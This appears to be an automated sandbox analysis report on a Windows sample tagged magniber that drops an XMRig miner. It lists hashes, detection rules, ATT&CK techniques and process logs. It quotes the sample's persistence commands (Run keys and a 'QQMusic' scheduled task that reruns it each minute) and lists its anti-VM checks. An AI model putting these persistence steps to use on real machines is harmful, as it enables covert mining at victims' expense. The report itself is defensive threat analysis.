xmrig | d4d451457c40bf4dacb36cbbedc89c6dede6dba47493b472aa1450d8c9f87239

General

Target

2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe
Size

9.0MB
MD5

2d927fdb462570728a981443bf36d19f
SHA1

eb4f351d937729b14a196bf228ba12a2ff07e73e
SHA256

d4d451457c40bf4dacb36cbbedc89c6dede6dba47493b472aa1450d8c9f87239
SHA512

efdf3b568fa07d67bb89eb8880c5140653321f9267c771045d1c7be6a6e88fd680059b779d2e4da497e0a88ff1e9adac6e293bb254e5c4dda776aafd518097c9
SSDEEP

196608:rhHMBGC3PtXtT+Was8/wq1wo9JoYx5JAMdJOnZTG1IvQSaKe6NZOn:r2G02wuwasMdJOnZKVSaaNZOn

Score

10^/10

xmrig miner persistence upx

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

Detects Windows executables referencing non-Windows User-Agents 1 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe	INDICATOR_SUSPICIOUS_EXE_NoneWindowsUA

UPX dump on OEP (original entry point) 23 IoCs

Processes:

resource	yara_rule
C:\ProgramData\spreadTpqrst.exe	UPX
behavioral2/memory/4148-8-0x00007FF649ED0000-0x00007FF64A514000-memory.dmp	UPX
behavioral2/memory/4148-132-0x00007FF649ED0000-0x00007FF64A514000-memory.dmp	UPX
behavioral2/memory/4148-138-0x00007FF649ED0000-0x00007FF64A514000-memory.dmp	UPX
behavioral2/memory/1060-142-0x00007FF649ED0000-0x00007FF64A514000-memory.dmp	UPX
behavioral2/memory/4524-150-0x00007FF649ED0000-0x00007FF64A514000-memory.dmp	UPX
behavioral2/memory/912-153-0x00007FF649ED0000-0x00007FF64A514000-memory.dmp	UPX
behavioral2/memory/3688-157-0x00007FF649ED0000-0x00007FF64A514000-memory.dmp	UPX
behavioral2/memory/5964-161-0x00007FF649ED0000-0x00007FF64A514000-memory.dmp	UPX
behavioral2/memory/6116-165-0x00007FF649ED0000-0x00007FF64A514000-memory.dmp	UPX
behavioral2/memory/1868-168-0x00007FF649ED0000-0x00007FF64A514000-memory.dmp	UPX
behavioral2/memory/6048-172-0x00007FF649ED0000-0x00007FF64A514000-memory.dmp	UPX
behavioral2/memory/5848-176-0x00007FF649ED0000-0x00007FF64A514000-memory.dmp	UPX
behavioral2/memory/6024-180-0x00007FF649ED0000-0x00007FF64A514000-memory.dmp	UPX
behavioral2/memory/6112-184-0x00007FF649ED0000-0x00007FF64A514000-memory.dmp	UPX
behavioral2/memory/6132-187-0x00007FF649ED0000-0x00007FF64A514000-memory.dmp	UPX
behavioral2/memory/1868-196-0x00007FF649ED0000-0x00007FF64A514000-memory.dmp	UPX
behavioral2/memory/1868-198-0x00007FF649ED0000-0x00007FF64A514000-memory.dmp	UPX
behavioral2/memory/216-202-0x00007FF649ED0000-0x00007FF64A514000-memory.dmp	UPX
behavioral2/memory/2392-207-0x00007FF649ED0000-0x00007FF64A514000-memory.dmp	UPX
behavioral2/memory/1128-208-0x00007FF649ED0000-0x00007FF64A514000-memory.dmp	UPX
behavioral2/memory/1128-209-0x00007FF649ED0000-0x00007FF64A514000-memory.dmp	UPX
behavioral2/memory/4764-212-0x00007FF649ED0000-0x00007FF64A514000-memory.dmp	UPX

XMRig Miner payload 20 IoCs

miner

Processes:

resource	yara_rule
behavioral2/memory/4148-132-0x00007FF649ED0000-0x00007FF64A514000-memory.dmp	xmrig
behavioral2/memory/4148-138-0x00007FF649ED0000-0x00007FF64A514000-memory.dmp	xmrig
behavioral2/memory/1060-142-0x00007FF649ED0000-0x00007FF64A514000-memory.dmp	xmrig
behavioral2/memory/4524-150-0x00007FF649ED0000-0x00007FF64A514000-memory.dmp	xmrig
behavioral2/memory/912-153-0x00007FF649ED0000-0x00007FF64A514000-memory.dmp	xmrig
behavioral2/memory/3688-157-0x00007FF649ED0000-0x00007FF64A514000-memory.dmp	xmrig
behavioral2/memory/5964-161-0x00007FF649ED0000-0x00007FF64A514000-memory.dmp	xmrig
behavioral2/memory/6116-165-0x00007FF649ED0000-0x00007FF64A514000-memory.dmp	xmrig
behavioral2/memory/1868-168-0x00007FF649ED0000-0x00007FF64A514000-memory.dmp	xmrig
behavioral2/memory/6048-172-0x00007FF649ED0000-0x00007FF64A514000-memory.dmp	xmrig
behavioral2/memory/5848-176-0x00007FF649ED0000-0x00007FF64A514000-memory.dmp	xmrig
behavioral2/memory/6024-180-0x00007FF649ED0000-0x00007FF64A514000-memory.dmp	xmrig
behavioral2/memory/6112-184-0x00007FF649ED0000-0x00007FF64A514000-memory.dmp	xmrig
behavioral2/memory/1868-196-0x00007FF649ED0000-0x00007FF64A514000-memory.dmp	xmrig
behavioral2/memory/1868-198-0x00007FF649ED0000-0x00007FF64A514000-memory.dmp	xmrig
behavioral2/memory/216-202-0x00007FF649ED0000-0x00007FF64A514000-memory.dmp	xmrig
behavioral2/memory/2392-207-0x00007FF649ED0000-0x00007FF64A514000-memory.dmp	xmrig
behavioral2/memory/1128-208-0x00007FF649ED0000-0x00007FF64A514000-memory.dmp	xmrig
behavioral2/memory/1128-209-0x00007FF649ED0000-0x00007FF64A514000-memory.dmp	xmrig
behavioral2/memory/4764-212-0x00007FF649ED0000-0x00007FF64A514000-memory.dmp	xmrig

Executes dropped EXE 22 IoCs

Processes:

spreadTpqrst.exeSMB.exespreadTpqrst.exespreadTpqrst.exe2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exespreadTpqrst.exespreadTpqrst.exespreadTpqrst.exespreadTpqrst.exespreadTpqrst.exespreadTpqrst.exespreadTpqrst.exespreadTpqrst.exespreadTpqrst.exespreadTpqrst.exespreadTpqrst.exespreadTpqrst.exespreadTpqrst.exespreadTpqrst.exespreadTpqrst.exespreadTpqrst.exespreadTpqrst.exe

pid	process
4148	spreadTpqrst.exe
4952	SMB.exe
1060	spreadTpqrst.exe
4524	spreadTpqrst.exe
1396	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe
912	spreadTpqrst.exe
3688	spreadTpqrst.exe
5964	spreadTpqrst.exe
6116	spreadTpqrst.exe
1868	spreadTpqrst.exe
6048	spreadTpqrst.exe
5848	spreadTpqrst.exe
6024	spreadTpqrst.exe
6112	spreadTpqrst.exe
6132	spreadTpqrst.exe
6040	spreadTpqrst.exe
1868	spreadTpqrst.exe
216	spreadTpqrst.exe
1128	spreadTpqrst.exe
2392	spreadTpqrst.exe
4764	spreadTpqrst.exe
1128	spreadTpqrst.exe

UPX packed file 24 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\ProgramData\spreadTpqrst.exe	upx
behavioral2/memory/4148-8-0x00007FF649ED0000-0x00007FF64A514000-memory.dmp	upx
behavioral2/memory/4148-132-0x00007FF649ED0000-0x00007FF64A514000-memory.dmp	upx
behavioral2/memory/4148-138-0x00007FF649ED0000-0x00007FF64A514000-memory.dmp	upx
behavioral2/memory/1060-142-0x00007FF649ED0000-0x00007FF64A514000-memory.dmp	upx
behavioral2/memory/4524-150-0x00007FF649ED0000-0x00007FF64A514000-memory.dmp	upx
behavioral2/memory/912-153-0x00007FF649ED0000-0x00007FF64A514000-memory.dmp	upx
behavioral2/memory/3688-157-0x00007FF649ED0000-0x00007FF64A514000-memory.dmp	upx
behavioral2/memory/5964-161-0x00007FF649ED0000-0x00007FF64A514000-memory.dmp	upx
behavioral2/memory/6116-165-0x00007FF649ED0000-0x00007FF64A514000-memory.dmp	upx
behavioral2/memory/1868-168-0x00007FF649ED0000-0x00007FF64A514000-memory.dmp	upx
behavioral2/memory/6048-172-0x00007FF649ED0000-0x00007FF64A514000-memory.dmp	upx
behavioral2/memory/5848-176-0x00007FF649ED0000-0x00007FF64A514000-memory.dmp	upx
behavioral2/memory/6024-180-0x00007FF649ED0000-0x00007FF64A514000-memory.dmp	upx
behavioral2/memory/6112-184-0x00007FF649ED0000-0x00007FF64A514000-memory.dmp	upx
behavioral2/memory/6132-187-0x00007FF649ED0000-0x00007FF64A514000-memory.dmp	upx
behavioral2/memory/1868-196-0x00007FF649ED0000-0x00007FF64A514000-memory.dmp	upx
behavioral2/memory/1868-198-0x00007FF649ED0000-0x00007FF64A514000-memory.dmp	upx
behavioral2/memory/216-202-0x00007FF649ED0000-0x00007FF64A514000-memory.dmp	upx
behavioral2/memory/2392-207-0x00007FF649ED0000-0x00007FF64A514000-memory.dmp	upx
behavioral2/memory/1128-208-0x00007FF649ED0000-0x00007FF64A514000-memory.dmp	upx
behavioral2/memory/1128-209-0x00007FF649ED0000-0x00007FF64A514000-memory.dmp	upx
behavioral2/memory/4764-212-0x00007FF649ED0000-0x00007FF64A514000-memory.dmp	upx
behavioral2/memory/1128-215-0x00007FF649ED0000-0x00007FF64A514000-memory.dmp	upx

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\QQMusic = "C:\\Users\\Admin\\AppData\\Local\\Temp\\2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe"	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\QQMusic = "C:\\Users\\Admin\\AppData\\Local\\Temp\\2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe"	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe

Enumerates connected drives 3 TTPs 1 IoCs
Attempts to read the root path of hard drives other than the default C: drive.

Query Registry
T1012

Peripheral Device Discovery
T1120

System Information Discovery
T1082

Processes:

2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe

description ioc process

File opened (read-only) \??\K: 2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe

description	ioc	process
File opened (read-only)	\??\K:	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe

Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 2 IoCs

Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

System Information Discovery

T1082

Processes:

2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe

description	ioc	process
File opened (read-only)	\??\VBoxMiniRdrDN	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe
File opened (read-only)	\??\VBoxMiniRdrDN	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe

Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exe

pid process

3632 schtasks.exe
Gathers network information 2 TTPs 6 IoCs
Uses commandline utility to view network configuration.

System Information Discovery
T1082

Command and Scripting Interpreter
T1059

Processes:

ipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exe

pid process

972 ipconfig.exe
3612 ipconfig.exe
5900 ipconfig.exe
4548 ipconfig.exe
932 ipconfig.exe
2392 ipconfig.exe

pid	process
3632	schtasks.exe

pid	process
972	ipconfig.exe
3612	ipconfig.exe
5900	ipconfig.exe
4548	ipconfig.exe
932	ipconfig.exe
2392	ipconfig.exe

Kills process with taskkill 12 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	process
5992	taskkill.exe
5864	taskkill.exe
6096	taskkill.exe
1940	taskkill.exe
3332	taskkill.exe
836	taskkill.exe
1696	taskkill.exe
5988	taskkill.exe
6044	taskkill.exe
6064	taskkill.exe
4912	taskkill.exe
6020	taskkill.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe

pid	process
2648	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe
2648	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe
2648	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe
2648	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe
2648	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe
2648	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe
2648	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe
2648	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe
2648	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe
2648	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe
2648	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe
2648	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe
2648	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe
2648	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe
2648	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe
2648	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe
2648	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe
2648	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe
2648	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe
2648	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe
2648	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe
2648	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe
2648	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe
2648	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe
2648	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe
2648	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe
2648	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe
2648	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe
2648	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe
2648	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe
2648	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe
2648	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe
2648	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe
2648	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe
2648	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe
2648	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe
2648	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe
2648	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe
2648	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe
2648	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe
2648	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe
2648	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe
2648	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe
2648	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe
2648	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe
2648	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe
2648	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe
2648	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe
2648	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe
2648	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe
2648	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe
2648	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe
2648	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe
2648	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe
2648	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe
2648	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe
2648	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe
2648	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe
2648	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe
2648	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe
2648	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe
2648	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe
2648	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe
2648	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe

pid process

2648 2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe

Suspicious use of AdjustPrivilegeToken 56 IoCs

Processes:

2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exetaskkill.exespreadTpqrst.exetaskkill.exespreadTpqrst.exespreadTpqrst.exetaskkill.exespreadTpqrst.exespreadTpqrst.exetaskkill.exespreadTpqrst.exespreadTpqrst.exetaskkill.exespreadTpqrst.exespreadTpqrst.exetaskkill.exespreadTpqrst.exetaskkill.exespreadTpqrst.exespreadTpqrst.exetaskkill.exetaskkill.exetaskkill.exespreadTpqrst.exetaskkill.exespreadTpqrst.exespreadTpqrst.exespreadTpqrst.exetaskkill.exespreadTpqrst.exe

description	pid	process
Token: SeDebugPrivilege	2648	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe
Token: SeBackupPrivilege	2648	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe
Token: SeSecurityPrivilege	2648	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe
Token: SeSecurityPrivilege	2648	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe
Token: SeBackupPrivilege	2648	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe
Token: SeSecurityPrivilege	2648	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe
Token: SeBackupPrivilege	2648	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe
Token: SeSecurityPrivilege	2648	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe
Token: SeBackupPrivilege	2648	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe
Token: SeSecurityPrivilege	2648	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe
Token: SeDebugPrivilege	4912	taskkill.exe
Token: SeLockMemoryPrivilege	4148	spreadTpqrst.exe
Token: SeLockMemoryPrivilege	4148	spreadTpqrst.exe
Token: SeDebugPrivilege	836	taskkill.exe
Token: SeLockMemoryPrivilege	1060	spreadTpqrst.exe
Token: SeLockMemoryPrivilege	1060	spreadTpqrst.exe
Token: SeLockMemoryPrivilege	4524	spreadTpqrst.exe
Token: SeLockMemoryPrivilege	4524	spreadTpqrst.exe
Token: SeDebugPrivilege	1696	taskkill.exe
Token: SeLockMemoryPrivilege	912	spreadTpqrst.exe
Token: SeLockMemoryPrivilege	912	spreadTpqrst.exe
Token: SeLockMemoryPrivilege	3688	spreadTpqrst.exe
Token: SeLockMemoryPrivilege	3688	spreadTpqrst.exe
Token: SeDebugPrivilege	6020	taskkill.exe
Token: SeLockMemoryPrivilege	5964	spreadTpqrst.exe
Token: SeLockMemoryPrivilege	5964	spreadTpqrst.exe
Token: SeLockMemoryPrivilege	6116	spreadTpqrst.exe
Token: SeLockMemoryPrivilege	6116	spreadTpqrst.exe
Token: SeDebugPrivilege	5988	taskkill.exe
Token: SeLockMemoryPrivilege	1868	spreadTpqrst.exe
Token: SeLockMemoryPrivilege	1868	spreadTpqrst.exe
Token: SeLockMemoryPrivilege	6048	spreadTpqrst.exe
Token: SeLockMemoryPrivilege	6048	spreadTpqrst.exe
Token: SeDebugPrivilege	6044	taskkill.exe
Token: SeLockMemoryPrivilege	5848	spreadTpqrst.exe
Token: SeLockMemoryPrivilege	5848	spreadTpqrst.exe
Token: SeDebugPrivilege	5992	taskkill.exe
Token: SeLockMemoryPrivilege	6024	spreadTpqrst.exe
Token: SeLockMemoryPrivilege	6024	spreadTpqrst.exe
Token: SeLockMemoryPrivilege	6112	spreadTpqrst.exe
Token: SeLockMemoryPrivilege	6112	spreadTpqrst.exe
Token: SeDebugPrivilege	5864	taskkill.exe
Token: SeDebugPrivilege	6064	taskkill.exe
Token: SeDebugPrivilege	6096	taskkill.exe
Token: SeLockMemoryPrivilege	1868	spreadTpqrst.exe
Token: SeLockMemoryPrivilege	1868	spreadTpqrst.exe
Token: SeDebugPrivilege	1940	taskkill.exe
Token: SeLockMemoryPrivilege	216	spreadTpqrst.exe
Token: SeLockMemoryPrivilege	216	spreadTpqrst.exe
Token: SeLockMemoryPrivilege	1128	spreadTpqrst.exe
Token: SeLockMemoryPrivilege	1128	spreadTpqrst.exe
Token: SeLockMemoryPrivilege	4764	spreadTpqrst.exe
Token: SeLockMemoryPrivilege	4764	spreadTpqrst.exe
Token: SeDebugPrivilege	3332	taskkill.exe
Token: SeLockMemoryPrivilege	1128	spreadTpqrst.exe
Token: SeLockMemoryPrivilege	1128	spreadTpqrst.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exe

description	pid	process	target process
PID 2648 wrote to memory of 652	2648	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe	cmd.exe
PID 2648 wrote to memory of 652	2648	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe	cmd.exe
PID 2648 wrote to memory of 652	2648	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe	cmd.exe
PID 2648 wrote to memory of 2936	2648	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe	cmd.exe
PID 2648 wrote to memory of 2936	2648	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe	cmd.exe
PID 2648 wrote to memory of 2936	2648	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe	cmd.exe
PID 652 wrote to memory of 3632	652	cmd.exe	schtasks.exe
PID 652 wrote to memory of 3632	652	cmd.exe	schtasks.exe
PID 652 wrote to memory of 3632	652	cmd.exe	schtasks.exe
PID 2936 wrote to memory of 4912	2936	cmd.exe	taskkill.exe
PID 2936 wrote to memory of 4912	2936	cmd.exe	taskkill.exe
PID 2936 wrote to memory of 4912	2936	cmd.exe	taskkill.exe
PID 2648 wrote to memory of 5000	2648	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe	cmd.exe
PID 2648 wrote to memory of 5000	2648	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe	cmd.exe
PID 2648 wrote to memory of 5000	2648	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe	cmd.exe
PID 5000 wrote to memory of 972	5000	cmd.exe	ipconfig.exe
PID 5000 wrote to memory of 972	5000	cmd.exe	ipconfig.exe
PID 5000 wrote to memory of 972	5000	cmd.exe	ipconfig.exe
PID 2648 wrote to memory of 4148	2648	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe	spreadTpqrst.exe
PID 2648 wrote to memory of 4148	2648	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe	spreadTpqrst.exe
PID 2648 wrote to memory of 4952	2648	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe	SMB.exe
PID 2648 wrote to memory of 4952	2648	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe	SMB.exe
PID 2648 wrote to memory of 4952	2648	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe	SMB.exe
PID 2648 wrote to memory of 212	2648	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe	cmd.exe
PID 2648 wrote to memory of 212	2648	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe	cmd.exe
PID 2648 wrote to memory of 212	2648	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe	cmd.exe
PID 2648 wrote to memory of 1060	2648	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe	spreadTpqrst.exe
PID 2648 wrote to memory of 1060	2648	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe	spreadTpqrst.exe
PID 212 wrote to memory of 836	212	cmd.exe	taskkill.exe
PID 212 wrote to memory of 836	212	cmd.exe	taskkill.exe
PID 212 wrote to memory of 836	212	cmd.exe	taskkill.exe
PID 2648 wrote to memory of 4524	2648	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe	spreadTpqrst.exe
PID 2648 wrote to memory of 4524	2648	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe	spreadTpqrst.exe
PID 2648 wrote to memory of 3296	2648	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe	cmd.exe
PID 2648 wrote to memory of 3296	2648	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe	cmd.exe
PID 2648 wrote to memory of 3296	2648	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe	cmd.exe
PID 3296 wrote to memory of 3612	3296	cmd.exe	ipconfig.exe
PID 3296 wrote to memory of 3612	3296	cmd.exe	ipconfig.exe
PID 3296 wrote to memory of 3612	3296	cmd.exe	ipconfig.exe
PID 2648 wrote to memory of 4004	2648	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe	cmd.exe
PID 2648 wrote to memory of 4004	2648	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe	cmd.exe
PID 2648 wrote to memory of 4004	2648	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe	cmd.exe
PID 2648 wrote to memory of 912	2648	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe	spreadTpqrst.exe
PID 2648 wrote to memory of 912	2648	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe	spreadTpqrst.exe
PID 4004 wrote to memory of 1696	4004	cmd.exe	taskkill.exe
PID 4004 wrote to memory of 1696	4004	cmd.exe	taskkill.exe
PID 4004 wrote to memory of 1696	4004	cmd.exe	taskkill.exe
PID 2648 wrote to memory of 3688	2648	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe	spreadTpqrst.exe
PID 2648 wrote to memory of 3688	2648	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe	spreadTpqrst.exe
PID 2648 wrote to memory of 5848	2648	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe	cmd.exe
PID 2648 wrote to memory of 5848	2648	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe	cmd.exe
PID 2648 wrote to memory of 5848	2648	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe	cmd.exe
PID 5848 wrote to memory of 5900	5848	cmd.exe	ipconfig.exe
PID 5848 wrote to memory of 5900	5848	cmd.exe	ipconfig.exe
PID 5848 wrote to memory of 5900	5848	cmd.exe	ipconfig.exe
PID 2648 wrote to memory of 5924	2648	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe	cmd.exe
PID 2648 wrote to memory of 5924	2648	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe	cmd.exe
PID 2648 wrote to memory of 5924	2648	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe	cmd.exe
PID 2648 wrote to memory of 5964	2648	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe	spreadTpqrst.exe
PID 2648 wrote to memory of 5964	2648	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe	spreadTpqrst.exe
PID 5924 wrote to memory of 6020	5924	cmd.exe	taskkill.exe
PID 5924 wrote to memory of 6020	5924	cmd.exe	taskkill.exe
PID 5924 wrote to memory of 6020	5924	cmd.exe	taskkill.exe
PID 2648 wrote to memory of 6116	2648	2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe	spreadTpqrst.exe

C:\Users\Admin\AppData\Local\Temp\2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe
"C:\Users\Admin\AppData\Local\Temp\2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe"
1⤵
- Adds Run key to start application
- Enumerates connected drives
- Checks for VirtualBox DLLs, possible anti-VM trick
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2648

C:\Windows\SysWOW64\cmd.exe
cmd /c schtasks /create /sc minute /mo 1 /tn "QQMusic" /tr C:\Users\Admin\AppData\Local\Temp\2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe /F
2⤵
- Suspicious use of WriteProcessMemory
PID:652

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /sc minute /mo 1 /tn "QQMusic" /tr C:\Users\Admin\AppData\Local\Temp\2024-06-13_2d927fdb462570728a981443bf36d19f_magniber.exe /F
3⤵
- Creates scheduled task(s)
PID:3632

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im spreadTpqrst.exe&&exit
